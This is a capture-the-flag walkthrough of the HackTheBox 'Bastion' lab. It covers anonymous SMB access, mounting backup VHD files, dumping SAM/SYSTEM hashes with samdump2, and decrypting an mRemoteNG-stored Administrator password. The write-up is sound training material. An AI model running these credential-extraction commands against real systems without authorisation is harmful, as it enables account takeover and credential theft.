Mounting VHD Files and Windows Privilege Escalation | HackTheBox Bastion | CREST CRT Track
HackTheBox Bastion was a reliable easy-to-use box that presented just a few minor difficulties, such as mounting a VHD from a file sharing and regaining access to a password vault program. It begins, somewhat strangely, without a website and instead uses vhd images stored on an SMB share. Once mounted, these images give access to the registry hive needed to get credentials. These credentials enable the user to ssh into the host. We’ll exploit the mRemoteNG installation to pull the profile data and encrypted data, then demonstrate multiple techniques to decrypt those in order to gain administrator access. We can ssh in as administrator after We figure out the administrator password.
Initial Reconnaissance and Enumeration
I kicked things off with an nmap scan to sniff out open ports and services on the target machine. I used the command:
nmap -A <target_IP>
This -A switch is super handy because it enables OS detection, version detection, script scanning, and even a traceroute. The scan quickly told me that Port 22 (SSH) was open, the machine was likely running Windows Server 2016, and an SMB server was active. I also discovered the NetBIOS computer name was “bastion.tates.” To make things easier, I added the DNS name to my local /etc/hosts file. I did this by opening the file with sudo nano /etc/hosts and then verifying the entry with grep Bastion /etc/hosts.
SMB Share Enumeration and Access
Since SMB was up and running, and the nmap scan hinted at “guest” account usage, I tried to list shares anonymously using SMBMap. My command for that was:
smbmap -u anonymous -H <target_IP>
This revealed a “backups” share with read and write permissions! Naturally, I then connected to it using SMBClient:
smbclient //<target_IP>/backups -U ""
I just hit enter when it asked for a password. Inside, I found a “note.txt” file and a “WindowsImageBackup” directory. I used dir to list the files and get note.txt to download the note.
Analyzing Backup Files (VHD)
The “note.txt” warned against downloading the huge backup locally, which made sense given the slow VPN. The “WindowsImageBackup” directory contained large VHD (Virtual Hard Disk) files. To peek inside without downloading them, I decided to mount the SMB share locally. The command I used was something like:
sudo mount -t cifs //<target_IP>/backups /path/to/local/mountpoint -o username=anonymous
After mounting the share, I used guestmount to mount the VHD files themselves. This allowed me to explore the Windows file system within the backup! For example, for one of the VHD files, the command looked like:
sudo guestmount --add /path/to/local/mountpoint/WindowsImageBackup/BASTION/Backup\ 2023-04-26\ 120000/xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxx.vhd -i --ro /mnt/vhd_mountpoint
I had to remember to use \ to escape any spaces in the file or directory names.
Dumping Hashes
With the VHD mounted, my next goal was to extract password hashes from the SAM and SYSTEM files, which are usually found in Windows/System32/config within the mounted VHD. I copied these files to my local machine using commands like:
sudo cp /mnt/vhd_mountpoint/Windows/System32/config/SYSTEM /path/to/desktop/sudo cp /mnt/vhd_mountpoint/Windows/System32/config/SAM /path/to/desktop/
Then, I used Samdump2 to extract the hashes:
samdump2 SYSTEM SAM
This revealed a hash for a user, which I then cracked using an online tool like CrackStation to get the password.
Gaining User Access and Privilege Escalation
With the password in hand, I logged in via SSH as the user “L4mpje” using:
ssh L4mpje@<target_IP>
I quickly grabbed the user flag from the desktop. For privilege escalation, I considered tools like WinPEAS, PowerView, or PowerSploit, but then I spotted MRemoteNG installed in Program Files (x86). MRemoteNG is known to store connection passwords, sometimes in plain text or easily decryptable formats, in an XML configuration file. I found the confCons.xml file in C:\Users\<username>\AppData\Roaming\MRemoteNG.
To get it to my local machine, I used SCP (Secure Copy Protocol):
scp L4mpje@<target_IP>:/Users/L4mpje/AppData/Roaming/MRemoteNG/confCons.xml .
The XML file contained an encrypted password for an RDP session with the username “Administrator.” To decrypt it, I used a specific Python script called MRemoteNG Decryptor:
python3 mremoteng_decrypt.py -s <encrypted_password_string>
This gave me the Administrator password!
Gaining Administrator Access
Finally, I used the decrypted Administrator password to log in via SSH as Administrator:
ssh Administrator@<target_IP>
And just like that, I was able to retrieve the root flag! The most valuable new technique I picked up from this challenge was definitely mounting and navigating VHD files using guestmount.
